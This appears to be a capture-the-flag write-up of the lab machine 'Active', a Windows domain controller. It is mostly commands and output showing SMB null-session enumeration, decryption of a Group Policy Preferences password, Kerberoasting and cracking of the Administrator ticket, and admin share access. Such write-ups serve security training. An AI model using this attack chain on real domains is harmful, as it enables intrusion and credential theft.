Active
Nmap Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| Scanned at 2025-05-18 23:23:23 CDT for 455s
Not shown: 981 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-19 04:09:03Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49167/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
|
SMB Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\:
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users
|
NULL Sessions is available
Replication Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ smbclient //10.10.10.100/Replication
Password for [WORKGROUP\wzwr]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 05:37:44 2018
.. D 0 Sat Jul 21 05:37:44 2018
active.htb D 0 Sat Jul 21 05:37:44 2018
p
5217023 blocks of size 4096. 283794 blocks available
smb: \> pwd
Current directory is \\10.10.10.100\Replication\
smb: \>
|
We download all the thing inside with
1
2
3
| PROMPT OFF
RECURSE ON
mget *
|
By viewing the structure of downloaded directory:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| ┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ tree .
.
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
├── nmap
└── scripts
|
Groups.xml which is not the default thing, we can looks inside:
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ cat Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
|
We found a credentials with password
1
2
3
| ┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
|
SVC_TGS:GPPstillStandingStrong2k18
New Credentials SMB Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ crackmapexec smb active.htb -u "svc_tgs" -p "GPPstillStandingStrong2k18" --shares
SMB active.htb 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB active.htb 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB active.htb 445 DC [+] Enumerated shares
SMB active.htb 445 DC Share Permissions Remark
SMB active.htb 445 DC ----- ----------- ------
SMB active.htb 445 DC ADMIN$ Remote Admin
SMB active.htb 445 DC C$ Default share
SMB active.htb 445 DC IPC$ Remote IPC
SMB active.htb 445 DC NETLOGON READ Logon server share
SMB active.htb 445 DC Replication READ
SMB active.htb 445 DC SYSVOL READ Logon server share
SMB active.htb 445 DC Users READ
|
Users Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| ┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ smbclient //10.10.10.100/Users -U 'active.htb\svc_tgs'
Password for [ACTIVE.HTB\svc_tgs]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 09:39:20 2018
.. DR 0 Sat Jul 21 09:39:20 2018
Administrator D 0 Mon Jul 16 05:14:21 2018
All Users DHSrn 0 Tue Jul 14 00:06:44 2009
Default DHR 0 Tue Jul 14 01:38:21 2009
Default User DHSrn 0 Tue Jul 14 00:06:44 2009
desktop.ini AHS 174 Mon Jul 13 23:57:55 2009
Public DR 0 Mon Jul 13 23:57:55 2009
SVC_TGS D 0 Sat Jul 21 10:16:32 2018
5217023 blocks of size 4096. 283778 blocks available
smb: \> cd Administrator
smb: \Administrator\> ls
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \Administrator\> cd ..
smb: \> cd SVC_TGS
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 10:16:32 2018
.. D 0 Sat Jul 21 10:16:32 2018
Contacts D 0 Sat Jul 21 10:14:11 2018
Desktop D 0 Sat Jul 21 10:14:42 2018
Downloads D 0 Sat Jul 21 10:14:23 2018
Favorites D 0 Sat Jul 21 10:14:44 2018
Links D 0 Sat Jul 21 10:14:57 2018
My Documents D 0 Sat Jul 21 10:15:03 2018
My Music D 0 Sat Jul 21 10:15:32 2018
My Pictures D 0 Sat Jul 21 10:15:43 2018
My Videos D 0 Sat Jul 21 10:15:53 2018
Saved Games D 0 Sat Jul 21 10:16:12 2018
Searches D 0 Sat Jul 21 10:16:24 2018
5217023 blocks of size 4096. 283778 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 10:14:42 2018
.. D 0 Sat Jul 21 10:14:42 2018
user.txt AR 34 Sun May 18 22:44:02 2025
5217023 blocks of size 4096. 283778 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>
|
Privilege Escalation
Kerberoasting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ sudo impacket-GetUserSPNs -dc-ip 10.10.10.100 -request -outputfile hashes.asreproast active.htb/svc_tgs
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 14:06:40.351723 2025-05-18 22:44:06.304563
...
.. hashcat
...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$85a361edc45088512a053d72602f4cdf$4d786dc8e5a16f03a08ebdc9eed3fe492c20d2db8d4d6bcd091d9ad4882ebfa417af4d0688025e10fca3e2cb6a3e5bafa810e3b6ccf80a2efa98786757f844e07f5a22f17d98eaeb7c8604d252231f6e2faf3c451e5a71aa37792390feac783c3b41f2af80d00ef2d56d3164a8762943260e01613dd4cfe8c4d79a7a2b1cf03a14f382b5eacafc0546680af1236860a20753939f8c3c082b741a16974736912b3fa38196de04034ffaea0bf8adf3b7631942c07d4ba3e9d09bb5499e49981ff37e021337b9dd13ae845e46a0976d01fe700140693ae396dcb66c7661d2fee8524f842810ada24bf3d77a22def835bf829024b8647d287fc98217b1bb0318ef394e9ac43f5b10eba52789a0ad2a95fb552369c13aea93d9efdb6edc00be0de369fc7f3327088eb76ed840d09e7a9b8befd658ffc54c8a20ac8a0c29283514cf564d1de7660e7797d384fa76458d0ce6eb9283b7b8573d18e199f461b16dccc77f75c87bde99724326ade410a79b5366305182f704685f51f2cbac45fe19ffe1a5f2806250cd3fc23cb693b08cc43dc6fa681ca0005d4d0cac0db72354137f5e264f9c7e0efb7197e2e4b4813d88b667e78cd0ef827aa8b1f59391c766a863e5165b1b98242c4de232997f0f0522de4a375ffcdf7b507bac1ef6eb3e2bb7d6e0f43d806c7e8a9e53237fa3d91d5fa292ce932be7d459865c6408c410055d98765d30f0d8400d66844f59af080e7b1904d57c9a89a297a14129758674c1dfa71e71d40958735f994db65a1905a9764b0ff670ddf4ead60aa9b96378128a5bd8974f92f8d58ed7c04cb65a628c45fe13afef6843557ff770d2abbcbf982e5bfc31e48baffff6ec6e8760390c4a9d43f9592ae8249ad6627d7d77ecf487066b97a8b0f21404b83ac741100291fa26689dead4029727d2741eae2d309e4779ed40e30967b2ad889340d6fbfdac4e0527b51c28067d294a509d55f8a630785cb8260dd3678aad496767aebe6f8ed1f0181aa2e826da1c0bf69acf037ff043d0bcc9de1ef21d40ded7a15214af005164ad0c24973ccffd437d4b512233d55475c9c9a6095cd6c1ef1c61296fefde7dc0d31e8ac3c0bad861d7f48941a9ce959f44d7f421cc9ffd32843f05cb42e741bdc31be7197bde1ccf4d20d034d0f14707a897a244423f64574a13db550d4d8b515b68baed079cb66f7cbbb756e38d777f8b02280274d9ab980b1513845599dc57285559d8c61abb185242b036d42e:Ticketmaster1968
|
Administrator:Ticketmaster1968
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| ┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ crackmapexec smb active.htb -u 'administrator' -p 'Ticketmaster1968' --shares
SMB active.htb 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB active.htb 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB active.htb 445 DC [+] Enumerated shares
SMB active.htb 445 DC Share Permissions Remark
SMB active.htb 445 DC ----- ----------- ------
SMB active.htb 445 DC ADMIN$ READ,WRITE Remote Admin
SMB active.htb 445 DC C$ READ,WRITE Default share
SMB active.htb 445 DC IPC$ Remote IPC
SMB active.htb 445 DC NETLOGON READ,WRITE Logon server share
SMB active.htb 445 DC Replication READ
SMB active.htb 445 DC SYSVOL READ Logon server share
SMB active.htb 445 DC Users READ
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ smbclient //10.10.10.100/Users -U 'active.htb\administrator'
Password for [ACTIVE.HTB\administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 09:39:20 2018
.. DR 0 Sat Jul 21 09:39:20 2018
Administrator D 0 Mon Jul 16 05:14:21 2018
All Users DHSrn 0 Tue Jul 14 00:06:44 2009
Default DHR 0 Tue Jul 14 01:38:21 2009
Default User DHSrn 0 Tue Jul 14 00:06:44 2009
desktop.ini AHS 174 Mon Jul 13 23:57:55 2009
Public DR 0 Mon Jul 13 23:57:55 2009
SVC_TGS D 0 Sat Jul 21 10:16:32 2018
5217023 blocks of size 4096. 278791 blocks available
smb: \> cd Administrator/Desktop
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Administrator\Desktop\>
|
